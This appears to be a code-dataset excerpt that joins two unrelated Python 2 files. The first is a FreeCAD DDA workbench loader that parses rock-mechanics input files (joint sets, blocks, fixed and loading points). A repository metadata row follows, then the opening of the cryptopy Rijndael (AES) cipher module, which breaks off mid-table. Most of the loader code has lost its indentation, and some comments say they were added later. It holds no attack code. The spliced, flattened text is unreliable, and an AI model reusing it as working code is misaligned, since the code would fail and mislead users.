parse points , fixed points , loading points , measured points , hole points
:param file: input dl file
'''
tmpNums = range(4)
# fixed points
for i in range(self.__fixedPointNum):
str = self.__fileReader.getNextLine()
nums = str.strip().split()
for j in range(4):
tmpNums[j] = self.parseFloatNum(nums[j], 'fixed point coordinate number')
if tmpNums[j] == None :
return False
print 'fixed line %d : (%f , %f , %f , %f)'%(i , tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3])
self.__fixedPoints.append((tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3]))
# measured points
itemNames = ['loading point' , 'measured point' , 'hole point']
realNums = [self.__loadingPointNum , self.__measuredPointNum , self.__holePointNum]
for k in range(len(itemNames)):
for i in range(realNums[k]):
str = self.__fileReader.getNextLine()
nums = str.strip().split()
for j in range(2):
tmpNums[j] = self.parseFloatNum(nums[j], itemNames[k] +' coordinate number')
if tmpNums[j] == None :
return False
print '%s %d : (%f , %f)'%(itemNames[k] , i , tmpNums[0] , tmpNums[1])
if k==0 : self.__loadingPoints.append((tmpNums[0] , tmpNums[1]))
elif k==1 : self.__measuredPoints.append((tmpNums[0] , tmpNums[1]))
elif k==2 : self.__holePoints.append((tmpNums[0] , tmpNums[1]))
return True
def __parsePandect(self):
'''
        parse the overall numbers, for example the number of joint sets
'''
self.__miniLength = self.parseFloatNum(self.__fileReader.getNextLine(), 'minimun edge length')
if self.__miniLength == None :
return False
self.__jointSetNum = self.parseIntNum(self.__fileReader.getNextLine(), 'joint set number')
if self.__jointSetNum == None:
return False
self.__boundaryNodeNum = self.parseIntNum(self.__fileReader.getNextLine(), 'boundary line number')
if self.__boundaryNodeNum == None:
return False
self.__tunnelNum = self.parseIntNum(self.__fileReader.getNextLine(), 'tunnel number')
if self.__tunnelNum == None:
return False
self.__addtionalLineNum = self.parseIntNum(self.__fileReader.getNextLine(), 'additional line number')
if self.__addtionalLineNum == None:
return False
self.__materialLineNum = self.parseIntNum(self.__fileReader.getNextLine(), 'material line number')
if self.__materialLineNum == None:
return False
self.__boltElementNum = self.parseIntNum(self.__fileReader.getNextLine(), 'bolt element number')
if self.__boltElementNum == None:
return False
self.__fixedPointNum = self.parseIntNum(self.__fileReader.getNextLine(), 'fixed point number')
if self.__fixedPointNum == None:
return False
self.__loadingPointNum = self.parseIntNum(self.__fileReader.getNextLine(), 'loading point number')
if self.__loadingPointNum == None:
return False
self.__measuredPointNum = self.parseIntNum(self.__fileReader.getNextLine(), 'measured point number')
if self.__measuredPointNum == None:
return False
self.__holePointNum = self.parseIntNum(self.__fileReader.getNextLine(), 'hole point number')
if self.__holePointNum == None:
return False
return True
def save2Database(self):
'''
save data to DDADatabase.dl_database
'''
from DDAShapes import DDAJointSets , DDATunnels
DDADatabase.dl_database = DDADatabase.DLDatabase()
database = DDADatabase.dl_database
database.jointSets = self.__jointSets
DDAJointSets.dataTable.refreshData(database.jointSets)
database.slope = self.__slope
DDAJointSets.slopeDataTable.refreshData(database.slope)
database.tunnels = self.__tunnels
DDATunnels.dataTable.refreshData(database.tunnels)
# boundaryNodes
pts = [tuple(p) for p in self.__boundaryNodes]
pts.append(pts[0])
database.boundaryNodes = [DDAPolyLine( pts, 1)]
# additional lines
database.additionalLines = \
[DDALine((p[0],p[1],0) , (p[2],p[3],0) , p[4]) for p in self.__additionalLines]
# material line
database.materialLines = \
[DDALine((p[0],p[1],0) , (p[2],p[3],0) , p[4]) for p in self.__materialLines]
# bolt element
database.boltElements = \
[BoltElement((p[0],p[1],0) , (p[2],p[3],0) , p[4] , p[5] , p[6]) for p in self.__boltElements]
# points
database.fixedPoints = [DDAPoint(t[0],t[1]) for t in self.__fixedPoints]
database.loadingPoints = [DDAPoint(t[0],t[1]) for t in self.__loadingPoints]
database.measuredPoints = [DDAPoint(t[0],t[1]) for t in self.__measuredPoints]
database.holePoints = [DDAPoint(t[0],t[1]) for t in self.__holePoints]
self.reset()
import Base
Base.refreshAllShapes()
class ParseDFInputParameters(BaseParseData):
def __init__(self):
self.__file = None
self.reset()
def reset(self):
from DDADatabase import df_inputDatabase
self.paras = df_inputDatabase.paras
self.paras.reset()
def __parseParaSchema(self):
'''
parse parameters from DF parameters file
:param infile:
'''
for i in range(7):
line = self.__file.getNextLine()
            t = self.parseFloatNum(line)
if t==None: return False
if i==0: self.paras.ifDynamic = float(t)
elif i==1: self.paras.stepsNum = int(t)
elif i==2: self.paras.blockMatsNum = int(t)
elif i==3: self.paras.jointMatsNum = int(t)
elif i==4: self.paras.ratio = t
elif i==5: self.paras.OneSteptimeLimit = int(t)
else: self.paras.springStiffness = int(t)
print 'DF Para : IfDynamic: %d steps: %d blockMats: %d JointMats: %d Ratio: %f timeInterval: %d stiffness: %d'\
%(self.paras.ifDynamic, self.paras.stepsNum , self.paras.blockMatsNum , self.paras.jointMatsNum \
, self.paras.ratio, self.paras.OneSteptimeLimit, self.paras.springStiffness)
print 'Df parameters schema done'
return True
def __parsePointsParameters(self):
'''
parse parameters for fixed points and loading points
:param infile:
'''
# parse fixed points and loading points' type 0 : fixed points , 2: loading points
# fixed points
from DDADatabase import df_inputDatabase
if len(df_inputDatabase.fixedPoints)>0:
line = self.__file.getNextLine()
nums = line.split()
for i in nums:
if self.parseIntNum(i)==None :
return False
print nums
# loading points
if len(df_inputDatabase.loadingPoints)>0:
line = self.__file.getNextLine()
nums = line.split()
for i in nums:
if self.parseIntNum(i)==None :
return False
print nums
# parse loading points parameters (starttime , stressX , stressY , endtime , stressX , stressY)
for i in range(len(df_inputDatabase.loadingPoints)):
digits = [1]*6
line1 = self.__file.getNextLine()
nums1 = line1.split()
line2 = self.__file.getNextLine()
nums2 = line2.split()
for j in range(3):
digits[j] = self.parseIntNum(nums1[j])
digits[j+3] = self.parseIntNum(nums2[j])
if None in digits:
return False
self.paras.loadingPointMats.append(digits)
print nums1 , nums2
print 'fixed points and loading points done.'
return True
def __parseBlocksAndJointsPara(self):
'''
parse parameters for blocks and joints'
:param infile:
'''
for i in range(self.paras.blockMatsNum):
digits = [1]*14
line1 = self.__file.getNextLine()
nums1 = line1.split()
for j in range(5):
digits[j] = self.parseFloatNum(nums1[j])
line2 = self.__file.getNextLine()
nums2 = line2.split()
line3 = self.__file.getNextLine()
nums3 = line3.split()
line4 = self.__file.getNextLine()
nums4 = line4.split()
for j in range(3):
digits[j+5] = self.parseFloatNum(nums2[j])
digits[j+8] = self.parseFloatNum(nums3[j])
digits[j+11] = self.parseFloatNum(nums4[j])
if None in digits:
return False
self.paras.blockMats.append(digits)
print digits
for i in range(self.paras.jointMatsNum):
digits = [1]*3
line = self.__file.getNextLine()
nums = line.split()
for j in range(3):
digits[j] = self.parseFloatNum(nums[j])
if None in digits:
return False
self.paras.jointMats.append(digits)
print digits
print 'DF blocks and block vertices\' parameters done.'
return True
def __parseRestPara(self ):
'''
parse SOR and axes
:param infile:
'''
# parse SOR
line = self.__file.getNextLine()
self.paras.SOR = self.parseFloatNum(line)
if self.paras.SOR==None: return False
print 'SOR : ' , self.paras.SOR
line = self.__file.getNextLine()
nums = line.split()
for i in range(3):
if self.parseFloatNum(nums[i])==None:
return False
print nums
print 'DF parameters all done.'
return True
    def parse(self , path = None):
        self.reset()
        import Base
        if not path: path = Base.__currentProjectPath__+'/parameters.df'
        if not checkFileExists(path):
            return False
        self.__file = FileReader()
        self.__file.setFile(path)
if not self.__parseParaSchema() or not self.__parsePointsParameters() \
or not self.__parseBlocksAndJointsPara() or not self.__parseRestPara():
return False
return True
class ParseDFInputGraphData(BaseParseData):
def __init__(self):
self.__fileReader = None
def GetResources(self):
return {
'Pixmap' : 'LoadDFInput',
'MenuText': 'LoadDFInputData',
'ToolTip': "Load DF Input Data"}
def Activated(self):
self.parse()
import Base
Base.changeStep4Stage('ShapesAvailable')
def finish(self):
pass
def parse(self , path=None):
self.refreshBlocksData()
import Base
if not path : path = Base.__currentProjectPath__+'/data.df'
if not checkFileExists(path):
return False
file = open(path , "rb")
if not self.__parseDataSchema(file) or not self.__parseBlocks(file) or \
not self.__parseBlockVertices(file) or not self.__parseBoltElements(file) \
or not self.__parsePoints(file):
            Base.showErrorMessageBox("DataError", 'Data input invalid')
return False
return True
def refreshBlocksData(self):
import Base
self.graph = Base.getDatabaser4CurrentStage()
self.graph.reset()
self.blocksNum = 0
self.blockVerticesNum = 0
self.fixedPointsNum = 0
self.loadingPointsNum = 0
self.measuredPointsNum = 0
self.boltElementsNum = 0
def __parseDataSchema(self , infile):
line = infile.readline()
nums = line.split()
self.blocksNum = self.parseIntNum(nums[0])
self.boltElementsNum = self.parseIntNum(nums[1])
self.blockVerticesNum = self.parseIntNum(nums[2])
line = infile.readline()
nums = line.split()
self.fixedPointsNum = self.parseIntNum(nums[0])
self.loadingPointsNum = self.parseIntNum(nums[1])
self.measuredPointsNum = self.parseIntNum(nums[2])
if None in [self.blocksNum , self.boltElementsNum , self.blockVerticesNum \
, self.fixedPointsNum , self.loadingPointsNum , self.measuredPointsNum]:
return False
print 'DF data : blocks : %d bolts : %d vertices : %d fixed Pnts :%d LoadingPnts :%d MeasuredPnts: %d' \
%(self.blocksNum , self.boltElementsNum , self.blockVerticesNum \
, self.fixedPointsNum , self.loadingPointsNum , self.measuredPointsNum)
return True
def __parseBlocks(self , infile):
'''
        parsing blocks and trying to get the maximum material No
:param infile:
'''
from DDADatabase import df_inputDatabase
df_inputDatabase.blockMatCollections = set()
blockMatCollection = df_inputDatabase.blockMatCollections
for i in range(0 , self.blocksNum):
line = infile.readline()
nums = line.split()
# get blocks' vertices' material No
t0 = self.parseIntNum(nums[0])
t1 = self.parseIntNum(nums[1])
t2 = self.parseIntNum(nums[2])
if t0==None or t1==None or t2==None:
return False
tmpB = Block()
tmpB.materialNo = t0
tmpB.startNo = t1
tmpB.endNo = t2
blockMatCollection.add(t0)
self.graph.blocks.append(tmpB )
# print line ,
print 'DF blocks Info done.'
return True
def __parseBlockVertices(self,infile):
'''
        parsing blocks' vertices and trying to get the maximum material No
:param infile:
'''
from DDADatabase import df_inputDatabase
df_inputDatabase.jointMatCollections =set()
jointMatCollection = df_inputDatabase.jointMatCollections
ptsBounds = range(4)
for i in range(self.blocksNum):
tmpB = self.graph.blocks[i]
for j in range(int(tmpB.endNo) - int(tmpB.startNo) +1): # read blocks vertices
line = infile.readline()
# print line
nums = line.split()
# get joint material No
                t0 = self.parseFloatNum(nums[0])
                t1 = self.parseFloatNum(nums[1])
                t2 = self.parseFloatNum(nums[2])
                if t0==None or t1==None or t2==None:
                    return False
                t0 = int(t0) # material No must be an integer index
tmpB.vertices.append( (t0,t1,t2) )
jointMatCollection.add(t0)
# get vertices' value boundary
                if i==0 and j==0:
                    ptsBounds[0]=ptsBounds[1] = t1
                    ptsBounds[2]=ptsBounds[3] = t2
                else:
                    if t1<ptsBounds[0]: ptsBounds[0]=t1
                    elif t1>ptsBounds[1]: ptsBounds[1]=t1
                    if t2<ptsBounds[2]: ptsBounds[2]=t2
                    elif t2>ptsBounds[3]: ptsBounds[3]=t2
for i in range(4): # block parameters
line = infile.readline()
# print line
nums = line.split()
t0 = self.parseFloatNum(nums[0])
t1 = self.parseFloatNum(nums[1])
t2 = self.parseFloatNum(nums[2])
if t0==None or t1==None or t2==None:
return False
tmpB.parameters.extend([t0,t1,t2])
import Base
margin = ptsBounds[1]-ptsBounds[0]
if margin > (ptsBounds[3]-ptsBounds[2]):
margin = ptsBounds[3]-ptsBounds[2]
Base.__radius4Points__ = margin/60
print 'DF blocks vertices data done.'
return True
def __parseBoltElements(self , infile):
for i in range(self.boltElementsNum):
for j in range(3):
line = infile.readline()
        print ' %d bolt elements parsed'%self.boltElementsNum
return True
def parse1Point(self , line , point):
#print line ,
nums = line.split()
point.x = self.parseFloatNum(nums[0])
point.y = self.parseFloatNum(nums[1])
point.blockNo = int(self.parseFloatNum(nums[2]))
def __parsePoints(self , infile):
'''
parsing fixed , loading , and measured points
:param infile:
'''
for i in range(self.fixedPointsNum):
pnt = FixedPoint()
line = infile.readline()
self.parse1Point(line , pnt)
self.graph.fixedPoints.append(pnt)
print ' fixed points : %d done'%self.fixedPointsNum
for i in range(self.loadingPointsNum):
pnt = LoadingPoint()
line = infile.readline()
self.parse1Point(line , pnt)
self.graph.loadingPoints.append(pnt)
print ' loading points : %d done'%self.loadingPointsNum
for i in range(self.measuredPointsNum):
pnt = MeasuredPoint()
line = infile.readline()
self.parse1Point(line , pnt)
self.graph.measuredPoints.append(pnt)
print ' measured points : %d done'%self.measuredPointsNum
print 'DF points done.'
return True
class ParseAndLoadDCInputData(BaseParseData):
def __init__(self):
self.reset()
self.__fileReader = FileReader()
self.database = None
def GetResources(self):
return {
'Pixmap' : 'LoadDCInput',
'MenuText': 'LoadDCInputData',
'ToolTip': "Load DC Input Data"}
def Activated(self):
self.parse()
import Base
Base.changeStep4Stage('SpecialStep')
import Base
database = Base.getDatabaser4CurrentStage()
database.clearRedoUndoList()
def finish(self):
pass
def reset(self):
self.jointLinesNum = 0
self.materialLinesNum = 0
self.additionalLinesNum = 0
self.boltElementsNum = 0
self.fixedPointsNum = 0
self.loadingPointsNum = 0
self.measuredPointsNum = 0
self.holePointsNum = 0
def __ParsePandect(self):
# from DDADatabase import dc_inputDatabase
self.__fileReader.getNextLine() # minimum edge length e0
nums = self.__fileReader.getNextLine().split()
self.jointLinesNum = self.parseIntNum(nums[0])
        # temporary code, I will try to revise this once I fully understand the data.dc
self.database.boundaryLinesNum = self.parseIntNum(nums[1])
nums = self.__fileReader.getNextLine()
self.materialLinesNum = self.parseIntNum(nums)
nums = self.__fileReader.getNextLine()
self.boltElementsNum = self.parseIntNum(nums)
nums = self.__fileReader.getNextLine()
self.fixedPointsNum = self.parseIntNum(nums)
nums = self.__fileReader.getNextLine()
self.loadingPointsNum = self.parseIntNum(nums)
nums = self.__fileReader.getNextLine()
self.measuredPointsNum = self.parseIntNum(nums)
nums = self.__fileReader.getNextLine()
self.holePointsNum = self.parseIntNum(nums)
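    # Illustrative sketch (added; inferred from the reads above, not part of
    # the original file): the data.dc header that __ParsePandect consumes
    # would look like
    #
    #   0.05            <- minimum edge length e0
    #   12 4            <- joint line count, boundary line count
    #   2               <- material line count
    #   3               <- bolt element count
    #   6               <- fixed point count
    #   1               <- loading point count
    #   2               <- measured point count
    #   0               <- hole point count
    #
    # The concrete numbers are hypothetical; only the ordering is taken from
    # the code.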
def __parseLines(self):
# from DDADatabase import dc_inputDatabase
# joint lines
self.database.jointLines = []
for i in range(self.jointLinesNum):
nums = self.__fileReader.getNextLine().split()
jointMaterial = int(self.parseFloatNum(nums[4]))
p1 = ( self.parseFloatNum(nums[0]) , self.parseFloatNum(nums[1]) , 0 )
p2 = ( self.parseFloatNum(nums[2]) , self.parseFloatNum(nums[3]) , 0 )
self.database.jointLines.append(DDALine(p1 , p2 , jointMaterial))
# material lines
self.database.materialLines = []
for i in range(self.materialLinesNum):
self.__fileReader.getNextLine()
# bolt elements
tmpNums = range(4)
self.database.boltElements = []
for i in range(self.boltElementsNum):
nums = self.__fileReader.getNextLine().split()
for j in range(4):
tmpNums[j] = self.parseFloatNum(nums[j], 'bolt element coordinate number')
if tmpNums[j] == None :
return False
e0 = self.parseFloatNum(nums[4], 'bolt element e0')
t0 = self.parseFloatNum(nums[5], 'bolt element t0')
f0 = self.parseFloatNum(nums[6], 'bolt element f0')
if e0==None or t0==None or f0==None :
return False
            print 'bolt element %d :(%f , %f , %f , %f , %f , %f , %f)'%(i , tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , e0 , t0 , f0)
self.database.boltElements.append(BoltElement(tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , e0 , t0 , f0))
def __parsePoints(self):
# from DDADatabase import dc_inputDatabase
import Base
# fixed points
windowInfo = [0 , 0 , 0 , 0]
nums = self.__fileReader.getNextLine().split()
p = (self.parseFloatNum(nums[0]) , self.parseFloatNum(nums[1]) , 0)
self.database.fixedPoints.append( FixedPoint(p[0] , p[1]))
windowInfo[0] = windowInfo[1] = p[0]
windowInfo[2] = windowInfo[3] = p[1]
for i in range(self.fixedPointsNum-1):
nums = self.__fileReader.getNextLine().split()
p = (self.parseFloatNum(nums[0]) , self.parseFloatNum(nums[1]) , 0)
if p[0]<windowInfo[0]:windowInfo[0] = p[0]
if p[0]>windowInfo[1]:windowInfo[1] = p[0]
if p[1]<windowInfo[2]:windowInfo[2] = p[1]
if p[1]>windowInfo[3]:windowInfo[3] = p[1]
self.database.fixedPoints.append( FixedPoint(p[0] , p[1]))
Base.__radius4Points__ = (windowInfo[1] - windowInfo[0]) * 0.01
Base.__windowInfo__ = windowInfo
# loading points
for i in range(self.loadingPointsNum):
nums = self.__fileReader.getNextLine().split()
self.database.loadingPoints.append( \
LoadingPoint(self.parseFloatNum(nums[0]) , self.parseFloatNum(nums[1])))
# measured points
for i in range(self.measuredPointsNum):
nums = self.__fileReader.getNextLine().split()
self.database.measuredPoints.append( \
MeasuredPoint(self.parseFloatNum(nums[0]) , self.parseFloatNum(nums[1])))
# hole points
for i in range(self.holePointsNum):
nums = self.__fileReader.getNextLine().split()
self.database.holePoints.append( \
HolePoint(self.parseFloatNum(nums[0]) , self.parseFloatNum(nums[1])))
def parse(self):
import Base
filename = Base.__currentProjectPath__ + '/data.dc'
print 'try to read DC data from file : ' , filename
# filename = Base.__currentProjectPath__ + '/tmpData.dc'
self.__fileReader.setFile(filename)
import DDADatabase
self.database = DDADatabase.DCInputDatabase()
self.reset()
self.__ParsePandect()
self.__parseLines()
self.__parsePoints()
self.__fileReader.closeFile()
DDADatabase.dc_inputDatabase = self.database
self.database = None
class DDALoadData():
def __init__(self):
self.current_path = Base.__currentProjectPath__
def changeStage( self ):
if Base.__currentStage__ == 'DL': # DL stage
print 'switch to DL stage'
self.parseData = ParseAndLoadDLData()
elif Base.__currentStage__ == 'DC': # DC stage
pass
def GetResources(self):
return {
'MenuText': 'Load',
'ToolTip': "Load DL data."}
def __storeFileName(self , filename):
'''
store the name of file which is being loaded
'''
file = open(self.current_path+'\\Ff.c' , 'wb')
file.write(filename.strip().split('/')[-1])
file.close()
def __confirmLoadFile(self):
'''
        if a new data file is loaded, old shapes will be cleared, so before doing this we have to make sure the user really wants it.
'''
box = QtGui.QMessageBox()
        box.setText('New data will be imported, and old shapes will be wiped.')
box.setInformativeText('Do you want to do this?')
box.setStandardButtons(QtGui.QMessageBox.Ok | QtGui.QMessageBox.Cancel)
box.setDefaultButton(QtGui.QMessageBox.Ok)
ret = box.exec_()
if ret == QtGui.QMessageBox.Ok:
return True
return False
def Activated(self):
self.changeStage()
filename = str( QtGui.QFileDialog.getOpenFileName(None , 'please select input file' , self.current_path) )
if not self.parseData.parse(filename):
self.parseData.reset()
print 'input data status : invalid'
return False
print 'input data status : ok'
if self.__confirmLoadFile():
self.__storeFileName(filename)
self.parseData.save2Database()
FreeCADGui.DDADisplayCmd.preview()
def finish(self):
pass
FreeCADGui.addCommand('DDA_LoadDLInputData', ParseAndLoadDLData())
FreeCADGui.addCommand('DDA_Load', DDALoadData())
FreeCADGui.addCommand('DDA_LoadDCInputData', ParseAndLoadDCInputData())
FreeCADGui.addCommand('DDA_LoadDFInputGraphData', ParseDFInputGraphData())
|
lgpl-2.1
| -3,771,634,351,096,124,000
| 36.414041
| 156
| 0.529423
| false
| 3.983707
| false
| false
| false
|
TheDSCPL/SSRE_2017-2018_group8
|
Projeto/Python/cryptopy/crypto/cipher/rijndael.py
|
1
|
14718
|
# -*- coding: utf-8 -*-
""" crypto.cipher.rijndael
Rijndael encryption algorithm
This byte oriented implementation is intended to closely
match FIPS specification for readability. It is not implemented
for performance.
Copyright © (c) 2002 by Paul A. Lambert
Read LICENSE.txt for license information.
2002-06-01
"""
from crypto.cipher.base import BlockCipher, padWithPadLen, noPadding
class Rijndael(BlockCipher):
""" Rijndael encryption algorithm """
def __init__(self, key = None, padding = padWithPadLen(), keySize=16, blockSize=16 ):
self.name = 'RIJNDAEL'
self.keySize = keySize
self.strength = keySize*8
self.blockSize = blockSize # blockSize is in bytes
self.padding = padding # change default to noPadding() to get normal ECB behavior
        assert( keySize%4==0 and NrTable[4].has_key(keySize/4)),'key size must be 16, 20, 24, 28 or 32 bytes'
        assert( blockSize%4==0 and NrTable.has_key(blockSize/4)), 'block size must be 16, 20, 24, 28 or 32 bytes'
self.Nb = self.blockSize/4 # Nb is number of columns of 32 bit words
self.Nk = keySize/4 # Nk is the key length in 32-bit words
self.Nr = NrTable[self.Nb][self.Nk] # The number of rounds (Nr) is a function of
# the block (Nb) and key (Nk) sizes.
if key != None:
self.setKey(key)
def setKey(self, key):
""" Set a key and generate the expanded key """
assert( len(key) == (self.Nk*4) ), 'Key length must be same as keySize parameter'
self.__expandedKey = keyExpansion(self, key)
self.reset() # BlockCipher.reset()
def encryptBlock(self, plainTextBlock):
""" Encrypt a block, plainTextBlock must be a array of bytes [Nb by 4] """
self.state = self._toBlock(plainTextBlock)
AddRoundKey(self, self.__expandedKey[0:self.Nb])
        for round in range(1,self.Nr):          # for round = 1 step 1 to Nr-1
SubBytes(self)
ShiftRows(self)
MixColumns(self)
AddRoundKey(self, self.__expandedKey[round*self.Nb:(round+1)*self.Nb])
SubBytes(self)
ShiftRows(self)
AddRoundKey(self, self.__expandedKey[self.Nr*self.Nb:(self.Nr+1)*self.Nb])
return self._toBString(self.state)
def decryptBlock(self, encryptedBlock):
""" decrypt a block (array of bytes) """
self.state = self._toBlock(encryptedBlock)
AddRoundKey(self, self.__expandedKey[self.Nr*self.Nb:(self.Nr+1)*self.Nb])
for round in range(self.Nr-1,0,-1):
InvShiftRows(self)
InvSubBytes(self)
AddRoundKey(self, self.__expandedKey[round*self.Nb:(round+1)*self.Nb])
InvMixColumns(self)
InvShiftRows(self)
InvSubBytes(self)
AddRoundKey(self, self.__expandedKey[0:self.Nb])
return self._toBString(self.state)
def _toBlock(self, bs):
""" Convert binary string to array of bytes, state[col][row]"""
        assert ( len(bs) == 4*self.Nb ), 'Rijndael blocks must be of size blockSize'
return [[ord(bs[4*i]),ord(bs[4*i+1]),ord(bs[4*i+2]),ord(bs[4*i+3])] for i in range(self.Nb)]
def _toBString(self, block):
""" Convert block (array of bytes) to binary string """
l = []
for col in block:
for rowElement in col:
l.append(chr(rowElement))
return ''.join(l)
#-------------------------------------
""" Number of rounds Nr = NrTable[Nb][Nk]
Nb Nk=4 Nk=5 Nk=6 Nk=7 Nk=8
------------------------------------- """
NrTable = {4: {4:10, 5:11, 6:12, 7:13, 8:14},
5: {4:11, 5:11, 6:12, 7:13, 8:14},
6: {4:12, 5:12, 6:12, 7:13, 8:14},
7: {4:13, 5:13, 6:13, 7:13, 8:14},
8: {4:14, 5:14, 6:14, 7:14, 8:14}}
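# Quick sanity check of the table above (added for illustration): the
# standard AES-128 parameters Nb=4, Nk=4 give the familiar 10 rounds, and
# Nb=4, Nk=8 (AES-256) give 14.
assert NrTable[4][4] == 10 and NrTable[4][8] == 14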
#-------------------------------------
def keyExpansion(algInstance, keyString):
""" Expand a string of size keySize into a larger array """
Nk, Nb, Nr = algInstance.Nk, algInstance.Nb, algInstance.Nr # for readability
key = [ord(byte) for byte in keyString] # convert string to list
w = [[key[4*i],key[4*i+1],key[4*i+2],key[4*i+3]] for i in range(Nk)]
for i in range(Nk,Nb*(Nr+1)):
temp = w[i-1] # a four byte column
if (i%Nk) == 0 :
temp = temp[1:]+[temp[0]] # RotWord(temp)
temp = [ Sbox[byte] for byte in temp ]
temp[0] ^= Rcon[i/Nk]
elif Nk > 6 and i%Nk == 4 :
temp = [ Sbox[byte] for byte in temp ] # SubWord(temp)
w.append( [ w[i-Nk][byte]^temp[byte] for byte in range(4) ] )
return w
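# Worked size check (added for illustration, not in the original): the
# expanded key holds Nb*(Nr+1) four-byte words; with a 16-byte key and a
# 16-byte block (Nk=Nb=4, Nr=10) that is 4*11 = 44 words, matching FIPS-197.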
Rcon = (0,0x01,0x02,0x04,0x08,0x10,0x20,0x40,0x80,0x1b,0x36, # note extra '0' !!!
0x6c,0xd8,0xab,0x4d,0x9a,0x2f,0x5e,0xbc,0x63,0xc6,
0x97,0x35,0x6a,0xd4,0xb3,0x7d,0xfa,0xef,0xc5,0x91)
#-------------------------------------
def AddRoundKey(algInstance, keyBlock):
""" XOR the algorithm state with a block of key material """
for column in range(algInstance.Nb):
for row in range(4):
algInstance.state[column][row] ^= keyBlock[column][row]
#-------------------------------------
def SubBytes(algInstance):
for column in range(algInstance.Nb):
for row in range(4):
algInstance.state[column][row] = Sbox[algInstance.state[column][row]]
def InvSubBytes(algInstance):
for column in range(algInstance.Nb):
for row in range(4):
algInstance.state[column][row] = InvSbox[algInstance.state[column][row]]
Sbox = (0x63,0x7c,0x77,0x7b,0xf2,0x6b,0x6f,0xc5,
0x30,0x01,0x67,0x2b,0xfe,0xd7,0xab,0x76,
0xca,0x82,0xc9,0x7d,0xfa,0x59,0x47,0xf0,
0xad,0xd4,0xa2,0xaf,0x9c,0xa4,0x72,0xc0,
0xb7,0xfd,0x93,0x26,0x36,0x3f,0xf7,0xcc,
0x34,0xa5,0xe5,0xf1,0x71,0xd8,0x31,0x15,
0x04,0xc7,0x23,0xc3,0x18,0x96,0x05,0x9a,
0x07,0x12,0x80,0xe2,0xeb,0x27,0xb2,0x75,
0x09,0x83,0x2c,0x1a,0x1b,0x6e,0x5a,0xa0,
0x52,0x3b,0xd6,0xb3,0x29,0xe3,0x2f,0x84,
0x53,0xd1,0x00,0xed,0x20,0xfc,0xb1,0x5b,
0x6a,0xcb,0xbe,0x39,0x4a,0x4c,0x58,0xcf,
0xd0,0xef,0xaa,0xfb,0x43,0x4d,0x33,0x85,
0x45,0xf9,0x02,0x7f,0x50,0x3c,0x9f,0xa8,
0x51,0xa3,0x40,0x8f,0x92,0x9d,0x38,0xf5,
0xbc,0xb6,0xda,0x21,0x10,0xff,0xf3,0xd2,
0xcd,0x0c,0x13,0xec,0x5f,0x97,0x44,0x17,
0xc4,0xa7,0x7e,0x3d,0x64,0x5d,0x19,0x73,
0x60,0x81,0x4f,0xdc,0x22,0x2a,0x90,0x88,
0x46,0xee,0xb8,0x14,0xde,0x5e,0x0b,0xdb,
0xe0,0x32,0x3a,0x0a,0x49,0x06,0x24,0x5c,
0xc2,0xd3,0xac,0x62,0x91,0x95,0xe4,0x79,
0xe7,0xc8,0x37,0x6d,0x8d,0xd5,0x4e,0xa9,
0x6c,0x56,0xf4,0xea,0x65,0x7a,0xae,0x08,
0xba,0x78,0x25,0x2e,0x1c,0xa6,0xb4,0xc6,
0xe8,0xdd,0x74,0x1f,0x4b,0xbd,0x8b,0x8a,
0x70,0x3e,0xb5,0x66,0x48,0x03,0xf6,0x0e,
0x61,0x35,0x57,0xb9,0x86,0xc1,0x1d,0x9e,
0xe1,0xf8,0x98,0x11,0x69,0xd9,0x8e,0x94,
0x9b,0x1e,0x87,0xe9,0xce,0x55,0x28,0xdf,
0x8c,0xa1,0x89,0x0d,0xbf,0xe6,0x42,0x68,
0x41,0x99,0x2d,0x0f,0xb0,0x54,0xbb,0x16)
InvSbox = (0x52,0x09,0x6a,0xd5,0x30,0x36,0xa5,0x38,
0xbf,0x40,0xa3,0x9e,0x81,0xf3,0xd7,0xfb,
0x7c,0xe3,0x39,0x82,0x9b,0x2f,0xff,0x87,
0x34,0x8e,0x43,0x44,0xc4,0xde,0xe9,0xcb,
0x54,0x7b,0x94,0x32,0xa6,0xc2,0x23,0x3d,
0xee,0x4c,0x95,0x0b,0x42,0xfa,0xc3,0x4e,
0x08,0x2e,0xa1,0x66,0x28,0xd9,0x24,0xb2,
0x76,0x5b,0xa2,0x49,0x6d,0x8b,0xd1,0x25,
0x72,0xf8,0xf6,0x64,0x86,0x68,0x98,0x16,
0xd4,0xa4,0x5c,0xcc,0x5d,0x65,0xb6,0x92,
0x6c,0x70,0x48,0x50,0xfd,0xed,0xb9,0xda,
0x5e,0x15,0x46,0x57,0xa7,0x8d,0x9d,0x84,
0x90,0xd8,0xab,0x00,0x8c,0xbc,0xd3,0x0a,
0xf7,0xe4,0x58,0x05,0xb8,0xb3,0x45,0x06,
0xd0,0x2c,0x1e,0x8f,0xca,0x3f,0x0f,0x02,
0xc1,0xaf,0xbd,0x03,0x01,0x13,0x8a,0x6b,
0x3a,0x91,0x11,0x41,0x4f,0x67,0xdc,0xea,
0x97,0xf2,0xcf,0xce,0xf0,0xb4,0xe6,0x73,
0x96,0xac,0x74,0x22,0xe7,0xad,0x35,0x85,
0xe2,0xf9,0x37,0xe8,0x1c,0x75,0xdf,0x6e,
0x47,0xf1,0x1a,0x71,0x1d,0x29,0xc5,0x89,
0x6f,0xb7,0x62,0x0e,0xaa,0x18,0xbe,0x1b,
0xfc,0x56,0x3e,0x4b,0xc6,0xd2,0x79,0x20,
0x9a,0xdb,0xc0,0xfe,0x78,0xcd,0x5a,0xf4,
0x1f,0xdd,0xa8,0x33,0x88,0x07,0xc7,0x31,
0xb1,0x12,0x10,0x59,0x27,0x80,0xec,0x5f,
0x60,0x51,0x7f,0xa9,0x19,0xb5,0x4a,0x0d,
0x2d,0xe5,0x7a,0x9f,0x93,0xc9,0x9c,0xef,
0xa0,0xe0,0x3b,0x4d,0xae,0x2a,0xf5,0xb0,
0xc8,0xeb,0xbb,0x3c,0x83,0x53,0x99,0x61,
0x17,0x2b,0x04,0x7e,0xba,0x77,0xd6,0x26,
0xe1,0x69,0x14,0x63,0x55,0x21,0x0c,0x7d)
#-------------------------------------
""" For each block size (Nb), the ShiftRow operation shifts row i
by the amount Ci. Note that row 0 is not shifted.
Nb C1 C2 C3
------------------- """
shiftOffset = { 4 : ( 0, 1, 2, 3),
5 : ( 0, 1, 2, 3),
6 : ( 0, 1, 2, 3),
